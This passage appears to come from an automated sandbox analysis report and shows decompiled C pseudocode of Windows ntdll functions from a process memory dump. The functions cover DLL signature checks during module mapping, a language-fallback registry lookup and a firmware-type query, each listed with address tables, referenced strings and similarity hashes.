Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
API String ID: 0-1948996284
Opcode ID: c40b9a59fd0c939a450896c65e0ef153aa75ed225c84d4868d57b2d8a0d3fa5c
Instruction ID: 51af667fda3fb2ef50af0f387512dd8a7312552e2395104bb2c76227f09987c5
Opcode Fuzzy Hash: c40b9a59fd0c939a450896c65e0ef153aa75ed225c84d4868d57b2d8a0d3fa5c
Instruction Fuzzy Hash: 0491E471A006199FDB18DF59C88197EF3B5FF8A314B18416BF805AF251E730E949CB98

Uniqueness

Uniqueness Score: -1.00%

Function 03437E41, Relevance: 3.9, Strings: 3, Instructions: 174
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E03437E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E0343CEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E0342C9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x3515780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E034A5510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x3515780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E03447D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03447D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E034A7016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E03447D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E03447D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E034A7016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E0345A1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E0342B1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}

0x03437e4c
0x03437e50
0x03437e55
0x03437e58
0x03437e5d
0x03437e71
0x03437f33
0x03437e77
0x03437e77
0x03437e79
0x03437e79
0x03437e7e
0x03437f45
0x03489848
0x00000000
0x03489848
0x03437f4e
0x03437f53
0x03437f5a
0x00000000
0x00000000
0x0348985a
0x03489862
0x03489866
0x00000000
0x0348986c
0x00000000
0x0348986c
0x03437e84
0x03437e84
0x03437e8d
0x03489871
0x03437eb8
0x03437ec0
0x03437ec0
0x03437e9a
0x0348987e
0x00000000
0x00000000
0x03489884
0x0348988b
0x034898a7
0x034898ac
0x034898b1
0x034898b6
0x034898b8
0x034898b8
0x034898b9
0x00000000
0x034898b9
0x03437ea0
0x03437ea7
0x00000000
0x00000000
0x03437eac
0x03437eb1
0x03437ec6
0x03437ed0
0x034898cc
0x03437ed6
0x03437ed6
0x03437ed6
0x03437ede
0x03437ee3
0x034898e3
0x034898f0
0x03489902
0x034898f2
0x034898fb
0x034898fb
0x03489907
0x0348991d
0x0348991d
0x03489907
0x034898e3
0x03437ef0
0x03437f14
0x03437f14
0x03437f1e
0x03489946
0x03437f24
0x03437f24
0x03437f24
0x03437f2c
0x0348996a
0x03489975
0x03489975
0x0348997e
0x03489993
0x03489993
0x0348997e
0x00000000
0x03437ef2
0x03437efc
0x03437f0a
0x03437f0e
0x03489933
0x00000000
0x03489933
0x00000000
0x03437f0e
0x00000000
0x00000000
0x00000000
0x03437eb1

Strings

Could not validate the crypto signature for DLL %wZ, xrefs: 03489891
minkernel\ntdll\ldrmap.c, xrefs: 034898A2
LdrpCompleteMapModule, xrefs: 03489898

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
API String ID: 0-1676968949
Opcode ID: ec102f926d90a85b87dd3eb6390a1298205eb6dc1d596d4534ed46411c27488c
Instruction ID: 1fa0589e941992b189158273ec5b50c602207d303313404f994d406158d6d7a0
Opcode Fuzzy Hash: ec102f926d90a85b87dd3eb6390a1298205eb6dc1d596d4534ed46411c27488c
Instruction Fuzzy Hash: 525103B1605B419FD721DB69C945B2ABFE4EB0A310F1809ABE8A19F7D1D730ED01CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0342E620, Relevance: 3.9, Strings: 3, Instructions: 165
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E0342E620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
				char _v32;
				char _v36;
				char _v44;
				signed int _v48;
				intOrPtr _v52;
				void* _v56;
				void* _v60;
				char _v64;
				void* _v68;
				void* _v76;
				void* _v84;
				signed int _t59;
				signed int _t74;
				signed short* _t75;
				signed int _t76;
				signed short* _t78;
				signed int _t83;
				short* _t93;
				signed short* _t94;
				short* _t96;
				void* _t97;
				signed int _t99;
				void* _t101;
				void* _t102;

				_t80 = __ecx;
				_t101 = (_t99 & 0xfffffff8) - 0x34;
				_t96 = __edx;
				_v44 = __edx;
				_t78 = 0;
				_v56 = 0;
				if(__ecx == 0 || __edx == 0) {
					L28:
					_t97 = 0xc000000d;
				} else {
					_t93 = _a4;
					if(_t93 == 0) {
						goto L28;
					}
					_t78 = E0342F358(__ecx, 0xac);
					if(_t78 == 0) {
						_t97 = 0xc0000017;
						L6:
						if(_v56 != 0) {
							_push(_v56);
							E034695D0();
						}
						if(_t78 != 0) {
							L034477F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t78);
						}
						return _t97;
					}
					E0346FA60(_t78, 0, 0x158);
					_v48 = _v48 & 0x00000000;
					_t102 = _t101 + 0xc;
					 *_t96 = 0;
					 *_t93 = 0;
					E0346BB40(_t80,  &_v36, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\NLS\\Language");
					_v36 = 0x18;
					_v28 =  &_v44;
					_v64 = 0;
					_push( &_v36);
					_push(0x20019);
					_v32 = 0;
					_push( &_v64);
					_v24 = 0x40;
					_v20 = 0;
					_v16 = 0;
					_t97 = E03469600();
					if(_t97 < 0) {
						goto L6;
					}
					E0346BB40(0,  &_v36, L"InstallLanguageFallback");
					_push(0);
					_v48 = 4;
					_t97 = L0342F018(_v64,  &_v44,  &_v56, _t78,  &_v48);
					if(_t97 >= 0) {
						if(_v52 != 1) {
							L17:
							_t97 = 0xc0000001;
							goto L6;
						}
						_t59 =  *_t78 & 0x0000ffff;
						_t94 = _t78;
						_t83 = _t59;
						if(_t59 == 0) {
							L19:
							if(_t83 == 0) {
								L23:
								E0346BB40(_t83, _t102 + 0x24, _t78);
								if(L034343C0( &_v48,  &_v64) == 0) {
									goto L17;
								}
								_t84 = _v48;
								 *_v48 = _v56;
								if( *_t94 != 0) {
									E0346BB40(_t84, _t102 + 0x24, _t94);
									if(L034343C0( &_v48,  &_v64) != 0) {
										 *_a4 = _v56;
									} else {
										_t97 = 0xc0000001;
										 *_v48 = 0;
									}
								}
								goto L6;
							}
							_t83 = _t83 & 0x0000ffff;
							while(_t83 == 0x20) {
								_t94 =  &(_t94[1]);
								_t74 =  *_t94 & 0x0000ffff;
								_t83 = _t74;
								if(_t74 != 0) {
									continue;
								}
								goto L23;
							}
							goto L23;
						} else {
							goto L14;
						}
						while(1) {
							L14:
							_t27 =  &(_t94[1]); // 0x2
							_t75 = _t27;
							if(_t83 == 0x2c) {
								break;
							}
							_t94 = _t75;
							_t76 =  *_t94 & 0x0000ffff;
							_t83 = _t76;
							if(_t76 != 0) {
								continue;
							}
							goto L23;
						}
						 *_t94 = 0;
						_t94 = _t75;
						_t83 =  *_t75 & 0x0000ffff;
						goto L19;
					}
				}
			}

0x0342e620
0x0342e628
0x0342e62f
0x0342e631
0x0342e635
0x0342e637
0x0342e63e
0x03485503
0x03485503
0x0342e64c
0x0342e64c
0x0342e651
0x00000000
0x00000000
0x0342e661
0x0342e665
0x0348542a
0x0342e715
0x0342e71a
0x0342e71c
0x0342e720
0x0342e720
0x0342e727
0x0342e736
0x0342e736
0x0342e743
0x0342e743
0x0342e673
0x0342e678
0x0342e67d
0x0342e682
0x0342e685
0x0342e692
0x0342e69b
0x0342e6a3
0x0342e6ad
0x0342e6b1
0x0342e6b2
0x0342e6bb
0x0342e6bf
0x0342e6c0
0x0342e6c8
0x0342e6cc
0x0342e6d5
0x0342e6d9
0x00000000
0x00000000
0x0342e6e5
0x0342e6ea
0x0342e6f9
0x0342e70b
0x0342e70f
0x03485439
0x0348545e
0x0348545e
0x00000000
0x0348545e
0x0348543b
0x0348543e
0x03485440
0x03485445
0x03485472
0x03485475
0x0348548d
0x03485493
0x034854a9
0x00000000
0x00000000
0x034854ab
0x034854b4
0x034854bc
0x034854c8
0x034854de
0x034854fb
0x034854e0
0x034854e6
0x034854eb
0x034854eb
0x034854de
0x00000000
0x034854bc
0x03485477
0x0348547a
0x03485480
0x03485483
0x03485486
0x0348548b
0x00000000
0x00000000
0x00000000
0x0348548b
0x00000000
0x00000000
0x00000000
0x00000000
0x03485447
0x03485447
0x03485447
0x03485447
0x0348544e
0x00000000
0x00000000
0x03485450
0x03485452
0x03485455
0x0348545a
0x00000000
0x00000000
0x00000000
0x0348545c
0x0348546a
0x0348546d
0x0348546f
0x00000000
0x0348546f
0x0342e70f

Strings

\Registry\Machine\System\CurrentControlSet\Control\NLS\Language, xrefs: 0342E68C
InstallLanguageFallback, xrefs: 0342E6DB
@, xrefs: 0342E6C0

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID: @$InstallLanguageFallback$\Registry\Machine\System\CurrentControlSet\Control\NLS\Language
API String ID: 0-1757540487
Opcode ID: fdef653aff535afeff1d9711545e87063d4dd30cf6a0d03e725be997e6b5849c
Instruction ID: 06511014324a2fa514c8aa7856a7bbf6e4cdb2cfc3f7c81a61fba7cc7f1bc9e8
Opcode Fuzzy Hash: fdef653aff535afeff1d9711545e87063d4dd30cf6a0d03e725be997e6b5849c
Instruction Fuzzy Hash: 2951C0765043159BC710EF26C440BAFB3E8AF89A14F4909AFF995EF340E734D94487AA

Uniqueness

Uniqueness Score: -1.00%

Function 034A51BE, Relevance: 2.7, Strings: 2, Instructions: 173
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E034A51BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed short* _t63;
				signed int _t64;
				signed int _t65;
				signed int _t67;
				intOrPtr _t74;
				intOrPtr _t84;
				intOrPtr _t88;
				intOrPtr _t94;
				void* _t100;
				void* _t103;
				intOrPtr _t105;
				signed int _t106;
				short* _t108;
				signed int _t110;
				signed int _t113;
				signed int* _t115;
				signed short* _t117;
				void* _t118;
				void* _t119;

				_push(0x80);
				_push(0x35005f0);
				E0347D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
				_t115 =  *(_t118 + 0xc);
				 *(_t118 - 0x7c) = _t115;
				 *((char*)(_t118 - 0x65)) = 0;
				 *((intOrPtr*)(_t118 - 0x64)) = 0;
				_t113 = 0;
				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
				 *((intOrPtr*)(_t118 - 4)) = 0;
				_t100 = __ecx;
				if(_t100 == 0) {
					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
					E0343EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
					 *((char*)(_t118 - 0x65)) = 1;
					_t63 =  *(_t118 - 0x90);
					_t101 = _t63[2];
					_t64 =  *_t63 & 0x0000ffff;
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					L20:
					_t65 = _t64 >> 1;
					L21:
					_t108 =  *((intOrPtr*)(_t118 - 0x80));
					if(_t108 == 0) {
						L27:
						 *_t115 = _t65 + 1;
						_t67 = 0xc0000023;
						L28:
						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
						L29:
						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
						E034A53CA(0);
						return E0347D130(0, _t113, _t115);
					}
					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
							 *_t108 = 0;
						}
						goto L27;
					}
					 *_t115 = _t65;
					_t115 = _t65 + _t65;
					E0346F3E0(_t108, _t101, _t115);
					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
					_t67 = 0;
					goto L28;
				}
				_t103 = _t100 - 1;
				if(_t103 == 0) {
					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
					_t74 = E03443690(1, _t117, 0x3401810, _t118 - 0x74);
					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
					_t101 = _t117[2];
					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
					if(_t74 < 0) {
						_t64 =  *_t117 & 0x0000ffff;
						_t115 =  *(_t118 - 0x7c);
						goto L20;
					}
					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
					_t115 =  *(_t118 - 0x7c);
					goto L21;
				}
				if(_t103 == 1) {
					_t105 = 4;
					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
					 *((intOrPtr*)(_t118 - 0x70)) = 0;
					_push(_t118 - 0x70);
					_push(0);
					_push(0);
					_push(_t105);
					_push(_t118 - 0x78);
					_push(0x6b);
					 *((intOrPtr*)(_t118 - 0x64)) = E0346AA90();
					 *((intOrPtr*)(_t118 - 0x64)) = 0;
					_t113 = L03444620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
					if(_t113 != 0) {
						_push(_t118 - 0x70);
						_push( *((intOrPtr*)(_t118 - 0x70)));
						_push(_t113);
						_push(4);
						_push(_t118 - 0x78);
						_push(0x6b);
						_t84 = E0346AA90();
						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
						if(_t84 < 0) {
							goto L29;
						}
						_t110 = 0;
						_t106 = 0;
						while(1) {
							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
							 *(_t118 - 0x88) = _t106;
							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
								break;
							}
							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
							_t106 = _t106 + 1;
						}
						_t88 = E034A500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
						_t119 = _t119 + 0x1c;
						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
						if(_t88 < 0) {
							goto L29;
						}
						_t101 = _t118 - 0x3c;
						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
						goto L21;
					}
					_t67 = 0xc0000017;
					goto L28;
				}
				_push(0);
				_push(0x20);
				_push(_t118 - 0x60);
				_push(0x5a);
				_t94 = E03469860();
				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
				if(_t94 < 0) {
					goto L29;
				}
				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
					_t101 = L"Legacy";
					_push(6);
				} else {
					_t101 = L"UEFI";
					_push(4);
				}
				_pop(_t65);
				goto L21;
			}

0x034a51be
0x034a51c3
0x034a51c8
0x034a51cd
0x034a51d0
0x034a51d3
0x034a51d8
0x034a51db
0x034a51de
0x034a51e0
0x034a51e3
0x034a51e6
0x034a51e8
0x034a5342
0x034a5351
0x034a5356
0x034a535a
0x034a5360
0x034a5363
0x034a5366
0x034a5369
0x034a5369
0x034a536b
0x034a536b
0x034a5370
0x034a53a3
0x034a53a4
0x034a53a6
0x034a53ab
0x034a53ab
0x034a53ae
0x034a53ae
0x034a53b5
0x034a53bf
0x034a53bf
0x034a5375
0x034a5396
0x034a53a0
0x034a53a0
0x00000000
0x034a5396
0x034a5377
0x034a5379
0x034a537f
0x034a538c
0x034a5390
0x00000000
0x034a5390
0x034a51ee
0x034a51f1
0x034a5301
0x034a5310
0x034a5315
0x034a5318
0x034a531b
0x034a5320
0x034a532e
0x034a5331
0x00000000
0x034a5331
0x034a5328
0x034a5329
0x00000000
0x034a5329
0x034a51fa
0x034a5235
0x034a5236
0x034a5239
0x034a523f
0x034a5240
0x034a5241
0x034a5242
0x034a5246
0x034a5247
0x034a524e
0x034a5251
0x034a5267
0x034a5269
0x034a526e
0x034a527d
0x034a527e
0x034a5281
0x034a5282
0x034a5287
0x034a5288
0x034a528a
0x034a528f
0x034a5294
0x00000000
0x00000000
0x034a529a
0x034a529c
0x034a529e
0x034a529e
0x034a52a4
0x034a52b0
0x00000000
0x00000000
0x034a52ba
0x034a52bc
0x034a52bc
0x034a52d4
0x034a52d9
0x034a52dc
0x034a52e1
0x00000000
0x00000000
0x034a52e7
0x034a52f4
0x00000000
0x034a52f4
0x034a5270
0x00000000
0x034a5270
0x034a51fc
0x034a51fd
0x034a5202
0x034a5203
0x034a5205
0x034a520a
0x034a520f
0x00000000
0x00000000
0x034a521b
0x034a5226
0x034a522b
0x034a521d
0x034a521d
0x034a5222
0x034a5222
0x034a522d
0x00000000

Strings

UEFI, xrefs: 034A521D
Legacy, xrefs: 034A5226

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: InitializeThunk
String ID: Legacy$UEFI
API String ID: 2994545307-634100481
Opcode ID: 8738cc80a33447c60210acad7945b2a2d1646843f328ce808ab4ddfd1264d1bf
Instruction ID: 68299e3990bc0f6eca6270412e503b8480ebaf0f0cf97b31c0b2c9996a515fd6
Opcode Fuzzy Hash: 8738cc80a33447c60210acad7945b2a2d1646843f328ce808ab4ddfd1264d1bf
Instruction Fuzzy Hash: E6517FB1E00B089FDB24DFA9CA80AAEB7B8FF55700F1440AEE599EF251D7719901CB14

Uniqueness

Uniqueness Score: -1.00%

Function 0344B944, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 76%

			E0344B944(signed int* __ecx, char __edx) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				intOrPtr _v44;
				signed int* _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v77;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t65;
				intOrPtr _t67;
				intOrPtr _t68;
				char* _t73;
				intOrPtr _t77;
				intOrPtr _t78;
				signed int _t82;
				intOrPtr _t83;
				void* _t87;
				char _t88;
				intOrPtr* _t89;
				intOrPtr _t91;
				void* _t97;
				intOrPtr _t100;
				void* _t102;
				void* _t107;
				signed int _t108;
				intOrPtr* _t112;
				void* _t113;
				intOrPtr* _t114;
				intOrPtr _t115;
				intOrPtr _t116;
				intOrPtr _t117;
				signed int _t118;
				void* _t130;

				_t120 = (_t118 & 0xfffffff8) - 0x4c;
				_v8 =  *0x351d360 ^ (_t118 & 0xfffffff8) - 0x0000004c;
				_t112 = __ecx;
				_v77 = __edx;
				_v48 = __ecx;
				_v28 = 0;
				_t5 = _t112 + 0xc; // 0x575651ff
				_t105 =  *_t5;
				_v20 = 0;
				_v16 = 0;
				if(_t105 == 0) {
					_t50 = _t112 + 4; // 0x5de58b5b
					_t60 =  *__ecx |  *_t50;
					if(( *__ecx |  *_t50) != 0) {
						 *__ecx = 0;
						__ecx[1] = 0;
						if(E03447D50() != 0) {
							_t65 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t65 = 0x7ffe0386;
						}
						if( *_t65 != 0) {
							E034F8CD6(_t112);
						}
						_push(0);
						_t52 = _t112 + 0x10; // 0x778df98b
						_push( *_t52);
						_t60 = E03469E20();
					}
					L20:
					_pop(_t107);
					_pop(_t113);
					_pop(_t87);
					return E0346B640(_t60, _t87, _v8 ^ _t120, _t105, _t107, _t113);
				}
				_t8 = _t112 + 8; // 0x8b000cc2
				_t67 =  *_t8;
				_t88 =  *((intOrPtr*)(_t67 + 0x10));
				_t97 =  *((intOrPtr*)(_t105 + 0x10)) - _t88;
				_t108 =  *(_t67 + 0x14);
				_t68 =  *((intOrPtr*)(_t105 + 0x14));
				_t105 = 0x2710;
				asm("sbb eax, edi");
				_v44 = _t88;
				_v52 = _t108;
				_t60 = E0346CE00(_t97, _t68, 0x2710, 0);
				_v56 = _t60;
				if( *_t112 != _t88 ||  *(_t112 + 4) != _t108) {
					L3:
					 *(_t112 + 0x44) = _t60;
					_t105 = _t60 * 0x2710 >> 0x20;
					 *_t112 = _t88;
					 *(_t112 + 4) = _t108;
					_v20 = _t60 * 0x2710;
					_v16 = _t60 * 0x2710 >> 0x20;
					if(_v77 != 0) {
						L16:
						_v36 = _t88;
						_v32 = _t108;
						if(E03447D50() != 0) {
							_t73 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t73 = 0x7ffe0386;
						}
						if( *_t73 != 0) {
							_t105 = _v40;
							E034F8F6A(_t112, _v40, _t88, _t108);
						}
						_push( &_v28);
						_push(0);
						_push( &_v36);
						_t48 = _t112 + 0x10; // 0x778df98b
						_push( *_t48);
						_t60 = E0346AF60();
						goto L20;
					} else {
						_t89 = 0x7ffe03b0;
						do {
							_t114 = 0x7ffe0010;
							do {
								_t77 =  *0x3518628; // 0x0
								_v68 = _t77;
								_t78 =  *0x351862c; // 0x0
								_v64 = _t78;
								_v72 =  *_t89;
								_v76 =  *((intOrPtr*)(_t89 + 4));
								while(1) {
									_t105 =  *0x7ffe000c;
									_t100 =  *0x7ffe0008;
									if(_t105 ==  *_t114) {
										goto L8;
									}
									asm("pause");
								}
								L8:
								_t89 = 0x7ffe03b0;
								_t115 =  *0x7ffe03b0;
								_t82 =  *0x7FFE03B4;
								_v60 = _t115;
								_t114 = 0x7ffe0010;
								_v56 = _t82;
							} while (_v72 != _t115 || _v76 != _t82);
							_t83 =  *0x3518628; // 0x0
							_t116 =  *0x351862c; // 0x0
							_v76 = _t116;
							_t117 = _v68;
						} while (_t117 != _t83 || _v64 != _v76);
						asm("sbb edx, [esp+0x24]");
						_t102 = _t100 - _v60 - _t117;
						_t112 = _v48;
						_t91 = _v44;
						asm("sbb edx, eax");
						_t130 = _t105 - _v52;
						if(_t130 < 0 || _t130 <= 0 && _t102 <= _t91) {
							_t88 = _t102 - _t91;
							asm("sbb edx, edi");
							_t108 = _t105;
						} else {
							_t88 = 0;
							_t108 = 0;
						}
						goto L16;
					}
				} else {
					if( *(_t112 + 0x44) == _t60) {
						goto L20;
					}
					goto L3;
				}
			}

0x0344b94c
0x0344b956
0x0344b95c
0x0344b95e
0x0344b964
0x0344b969
0x0344b96d
0x0344b96d
0x0344b970
0x0344b974
0x0344b97a
0x0344badf
0x0344badf
0x0344bae2
0x0344bae4
0x0344bae6
0x0344baf0
0x03492cb8
0x0344baf6
0x0344baf6
0x0344baf6
0x0344bafd
0x0344bb1f
0x0344bb1f
0x0344baff
0x0344bb00
0x0344bb00
0x0344bb03
0x0344bb03
0x0344bacb
0x0344bacf
0x0344bad0
0x0344bad1
0x0344badc
0x0344badc
0x0344b980
0x0344b980
0x0344b988
0x0344b98b
0x0344b98d
0x0344b990
0x0344b993
0x0344b999
0x0344b99b
0x0344b9a1
0x0344b9a5
0x0344b9aa
0x0344b9b0
0x0344b9bb
0x0344b9c0
0x0344b9c3
0x0344b9ca
0x0344b9cc
0x0344b9cf
0x0344b9d3
0x0344b9d7
0x0344ba94
0x0344ba94
0x0344ba98
0x0344baa3
0x03492ccb
0x0344baa9
0x0344baa9
0x0344baa9
0x0344bab1
0x03492cd5
0x03492cdd
0x03492cdd
0x0344babb
0x0344babc
0x0344bac2
0x0344bac3
0x0344bac3
0x0344bac6
0x00000000
0x0344b9dd
0x0344b9dd
0x0344b9e7
0x0344b9e7
0x0344b9ec
0x0344b9ec
0x0344b9f1
0x0344b9f5
0x0344b9fa
0x0344ba00
0x0344ba0c
0x0344ba10
0x0344ba10
0x0344ba12
0x0344ba18
0x00000000
0x00000000
0x0344bb26
0x0344bb26
0x0344ba1e
0x0344ba1e
0x0344ba23
0x0344ba25
0x0344ba2c
0x0344ba30
0x0344ba35
0x0344ba35
0x0344ba41
0x0344ba46
0x0344ba4c
0x0344ba50
0x0344ba54
0x0344ba6a
0x0344ba6e
0x0344ba70
0x0344ba74
0x0344ba78
0x0344ba7a
0x0344ba7c
0x0344ba8e
0x0344ba90
0x0344ba92
0x0344bb14
0x0344bb14
0x0344bb16
0x0344bb16
0x00000000
0x0344ba7c
0x0344bb0a
0x0344bb0d
0x00000000
0x00000000
0x00000000
0x0344bb0f

APIs

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0344B9A5

Memory Dump Source

Source File: 00000009.00000002.612089306.0000000003400000.00000040.00000001.sdmp, Offset: 03400000, based on PE: true

Associated: 00000009.00000002.612916101.000000000351B000.00000040.00000001.sdmp Download File
Associated: 00000009.00000002.612928123.000000000351F000.00000040.00000001.sdmp Download File

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 885266447-0
Opcode ID: 6d45637137681f9c92aff872ea47b9d31c36a07bf31d32d733cd27b4b1a8d58b
Instruction ID: 3fd70009d5d8a81966ae7419dd9c80c5aa0355e16c6765043de67fb1800aff8c
Opcode Fuzzy Hash: 6d45637137681f9c92aff872ea47b9d31c36a07bf31d32d733cd27b4b1a8d58b
Instruction Fuzzy Hash: CE513571A08340CFE720DF29C48092BBBE9FB88600F18896FE5D59B354D771E845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0342B171, Relevance: 1.7, APIs: 1, Instructions: 166
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E0342B171(signed short __ebx, intOrPtr __ecx, intOrPtr* __edx, intOrPtr* __edi, signed short __esi, void* __eflags) {
				signed int _t65;
				signed short _t69;
				intOrPtr _t70;
				signed short _t85;
				void* _t86;
				signed short _t89;
				signed short _t91;
				intOrPtr _t92;
				intOrPtr _t97;
				intOrPtr* _t98;
				signed short _t99;
				signed short _t101;
				void* _t102;
				char* _t103;
				signed short _t104;
